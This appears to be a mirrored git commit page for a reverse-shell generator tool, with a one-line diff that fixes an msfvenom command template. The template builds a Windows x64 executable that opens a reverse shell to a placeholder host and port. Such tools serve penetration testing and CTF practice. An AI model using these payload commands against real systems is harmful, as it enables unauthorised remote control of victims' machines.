mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2025-01-18 17:05:26 +00:00
Merge pull request #79 from FreeZeroDays/main
Fixing "Windows Staged Reverse TCP (x64)"
This commit is contained in:
commit
4a13743a78
@ -350,7 +350,7 @@ const msfvenomCommands = withCommandType(
|
||||
},
|
||||
{
|
||||
"name": "Windows Staged Reverse TCP (x64)",
|
||||
"command": "msfvenom -p windows/x64/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
|
||||
"command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
|
||||
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
|
||||
},
|
||||
{
|
||||
|
Loading…
Reference in New Issue
Block a user